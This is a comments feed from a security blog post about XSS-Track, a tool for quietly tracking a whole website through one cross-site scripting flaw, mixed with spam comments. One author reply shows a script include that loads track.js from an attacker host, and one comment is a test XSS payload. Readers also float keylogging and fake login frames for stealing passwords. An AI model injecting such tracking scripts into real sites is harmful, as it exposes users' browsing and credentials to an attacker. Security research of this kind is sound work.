tag:blogger.com,1999:blog-3650259870998252242.post6410887116766384751..comments2023-10-20T18:17:56.706+02:00Comments on the world. according to koto: XSS-Track: How to quietly track a whole website through single XSSAnonymoushttp://www.blogger.com/profile/11516786094492717236noreply@blogger.comBlogger14125tag:blogger.com,1999:blog-3650259870998252242.post-54686564952252849252021-03-20T08:28:18.020+01:002021-03-20T08:28:18.020+01:00Nice to be visiting your blog again, it has been m...Nice to be visiting your blog again, it has been months for me. Well this article that i've been waited for so long. I need this article to complete my assignment in the college, and it has same topic with your article. Thanks, great share. <a href="https://officialresultbd.com/22k-gold-price-in-bangladesh/" rel="nofollow">22k Gold Price in Bangladesh Per Vori</a><br />John Williamshttps://www.blogger.com/profile/07832850486011817276noreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-59744901303452489532021-03-10T07:48:40.870+01:002021-03-10T07:48:40.870+01:00Thanks for writing such a good article, I stumbled...Thanks for writing such a good article, I stumbled onto your blog and read a few post. I like your style of writing. <a href="https://www.capitalfund-hk.com/" rel="nofollow">commercial aircraft financing online</a><br />John Williamshttps://www.blogger.com/profile/07832850486011817276noreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-27944557782327033172021-03-03T07:21:00.199+01:002021-03-03T07:21:00.199+01:00Awesome blog. I enjoyed reading your articles. Thi...Awesome blog. I enjoyed reading your articles. This is truly a great read for me. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work! <a href="https://notjustanyoldday.com/" rel="nofollow">Cancer Awareness Charm</a><br />John Williamshttps://www.blogger.com/profile/07832850486011817276noreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-73446322942067860272013-05-09T08:55:29.534+02:002013-05-09T08:55:29.534+02:00Can also XSS track sniff cross-document messaging ...Can also XSS track sniff cross-document messaging between domainA.com and domainB.com (for example)?Akamnoreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-9220570223696094212012-05-21T13:45:50.157+02:002012-05-21T13:45:50.157+02:00alert("XSS")alert("XSS")XSSnoreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-4101452637889605972011-12-23T11:17:04.029+01:002011-12-23T11:17:04.029+01:00~Hi I didn't mean to say that the attacker had...~Hi I didn't mean to say that the attacker had control over the victim site, I was thinking more of like a forum type thing where people can post hyperlinks. In any case I think what I am thinking of is man in the middle phishing attacks having read more on the topic. Where the evilsite basically acts as a conduit from where traffic flows and gets recorded.Gregwinterznoreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-42071264639833762202011-12-22T23:54:44.591+01:002011-12-22T23:54:44.591+01:00So attacker needs to have control over site A (to ...So attacker needs to have control over site A (to plant the evil link) and evilsite (for the tracking code). Plus you need to setup cross domain communication between A and evilsite, and that requires custom JS code on both sites. <br /><br /><br />Since you have control over those two domains, anything is possible, but I don't see any victim site here. In XSS-track the victim needs to have a XSS vulnerability for the attacker to init the tracking and framing. You can't do it otherwise if you don't have control over the victim site. <br />And - if you have control over the victim site, I don't see any point why would you need the framing etc. since you can track anything without even leaving site A.kkotowiczhttp://blog.kotowicz.netnoreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-84684613857771592362011-12-22T22:13:31.177+01:002011-12-22T22:13:31.177+01:00Hi sorry, I re-read my post after the fact and als...Hi sorry, I re-read my post after the fact and also saw that it didn't make sense but found I couldn't edit it. <br /><br />Basically I was thinking of the scenario where the attacker lures a victim to click a link on lets say site A which pretends to just be a link to another page on the same site. <br /><br />The link actually send the victim to your evilsite.com which takes the referrer address SERVER[referrer], and opens this in an iframe above evilsite.com. So the victim thinks he/she is still on the site A, but we have them within evilsite.com with an iframe of the site A which we can track. I hope I have made this a little clearer, and thank you for answering. GregGregwinterznoreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-24756105877567607672011-12-22T12:04:46.669+01:002011-12-22T12:04:46.669+01:00Could you write some more about the setup you'...Could you write some more about the setup you're trying to test? I have a trouble understanding that. Maybe some proof of concept at pastehtml.com or pastebin.com ? It doesn't look possible without XSS, but I didn't understand the scenario fully.kkotowiczhttp://blog.kotowicz.netnoreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-47696563173292450902011-12-22T03:42:00.197+01:002011-12-22T03:42:00.197+01:00Edit I suppose that would only work for keylogging...Edit I suppose that would only work for keylogging though right?Gregwinterznoreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-57882521622308061932011-12-22T03:25:37.291+01:002011-12-22T03:25:37.291+01:00Hello there, I was reviewing the software, I was w...Hello there, I was reviewing the software, I was wondering whether this would work without the XSS vulnarability and if you just had a link which when the person clicked it and went to the http://attacker.kotowicz.net/xss-track/track.js page whether you could set it up such that the site clones the URL from the referer header? That way say another attack vector would be a link which is redressed to look like a link to another page on the same site. Is this sound in theory? GregGregwinterznoreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-46820203082475277652011-10-23T16:48:59.027+02:002011-10-23T16:48:59.027+02:00Hi there,
Yes it actually works now, thank you v...Hi there, <br /><br />Yes it actually works now, thank you very much for your help. I will be following your blog closely for future updates and will keep you posted on any bugs/ideas- what a great script!<br /><br />MarkJSTunernoreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-23556403824287381402011-10-21T14:12:37.920+02:002011-10-21T14:12:37.920+02:00It works for me on test script on my local domain ...It works for me on test script on my local domain in Firefox right now, logs shop up in show.php. Try adding ?start= after track.js (i.e. ... src="http://attacker.kotowicz.net/xss-track/track.js?start=[url-here]"> , it will load another URL in the frame. Check with Firebug what's going on.<br /><br />I might be better if you download xss sources from GitHub and try to host the show.php and track.js yourself on your domain, you then have full control and can debug more. kkotowiczhttp://blog.kotowicz.netnoreply@blogger.comtag:blogger.com,1999:blog-3650259870998252242.post-18725997259382909672010-11-12T21:01:06.655+01:002010-11-12T21:01:06.655+01:00Interesting, I thought something similar. By using...Interesting, I thought something similar. By using the iframe to show that there was an error and a login page... Because passwords are more powerful than sesioncookies.Jnoreply@blogger.com